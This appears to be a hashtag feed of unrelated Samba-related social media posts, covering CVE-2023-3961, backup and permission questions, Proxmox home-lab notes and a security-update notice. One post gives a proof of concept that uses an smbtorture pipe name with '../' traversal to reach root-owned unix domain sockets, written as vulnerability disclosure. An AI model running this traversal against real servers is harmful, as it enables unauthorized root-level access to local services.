Interesting #samba smbd #vulnerability CVE-2023-3961 allows samba client to connect to any server side unix domain socket. The access occurs as root user and thus any named unix domain socket is fully accessible. If suitable service exist on the server this will lead to unauthorized access to the service, assuming the socket file access rights are the only means of authorization. The impact depends entirely on the available services on the server, but may lead to #privilegeescalation or similar high severity impacts.
Updated to add: This vulnerability is made more difficult to exploit since the attacker has somewhat limited control on the data being sent to the socket.
CVE-2023-3961: #smbd allows client access to unix domain sockets on the file system
A client sending a pipe name containing unix directory traversal characters (../) could cause #Samba to connect to arbitrary unix domain sockets as root.
Wie bekommt man ein #Android dazu Dateien, vorrangig Bilder und Videos auf ein #Samba Share zu laden? Ich hätte sowas unter "Teilen" in der Galerie erwartet aber scheinbar ist das kein unterstütztes Feature...
Jemand eine Idee wie das geht?
Geht generell um #Backup und Netzwerk Zugriff auf die Daten.
Bin dankbar über jeden Hinweis.
This post is really a small collection of thoughts about Proxmox when used in a home lab situation and home labs in general. I was originally going to post this to Mastodon only but it didn't fit in a single post.
A lot of people (at least what I see on reddit) build Proxmox systems with shared file systems like ceph, even for home lab use.
Here is a Proof of Concept demonstrating the #samba smbd CVE-2023-3961 #vulnerability
On victim host running vulnerable Samba set up a unix domain socket only accessible as root user:
$ sudo socat UNIX-LISTEN:/pwned,mode=700,fork stdout
On attacking host:
$ smbtorture -U "" -N ncacn_np:victimhost[/pipe/../../../../../pwned] rpc.echo
At least stock Debian install samba allows anonymous exploitation in this manner. This is quite alarming, to say the least.
Note: smbtorture is built as part of samba build procedure – On Debian based systems you can use sudo apt build-dep samba && apt source samba && cd samba-* && dpkg-buildpackage to get it. Specify LD_LIBRARY_PATH as needed to make it find the necessary shared objects.
smbtorture will talk MS-RPC protocol to the unix domain socket, and as such is not directly useful as generic #exploitation tool. #Weaponizing the vulnerability is left as exercise for the reader.
Addendum: You can't fully control the data being sent to the socket. This will like neuter most attack scenarios.
Samba: Neue Versionen beheben mehrere Sicherheitslücken
Durch verschiedene Programmierfehler konnten Angreifer auf geheime Informationen bis hin zum Kerberos-TGT-Passwort zugreifen. Aktualisierungen stehen bereit.
Hm unter Debian11 (smbclient aus samba 4.13.13) tut das hier
(mit KRB5CCNAME=FILE:/tmp/krb5cc_nslcd):
smbclient -N --use-kerberos=required -gL <server>
Unter Debian 12 (smbclient aus samba 4.17.9) nicht mehr.
Mach ich was falsch oder wurde in #Samba bzw. das entsprechende Debianpaket ein Bug eingebaut?
If I use NFSv3, then all my shares are full of #AppleDouble files (i.e., with the "._" prefix).
If I use #NFSv4, then "git fetch" just hangs forever and never finishes.
If I use #Samba, then either 1) everything is 755 but I cannot delete files xD or 2) (after applying https://askubuntu.com/a/1126633/413683) the permissions are correct, but something is wrong with my .git: ad_convert: Failed to convert [.git].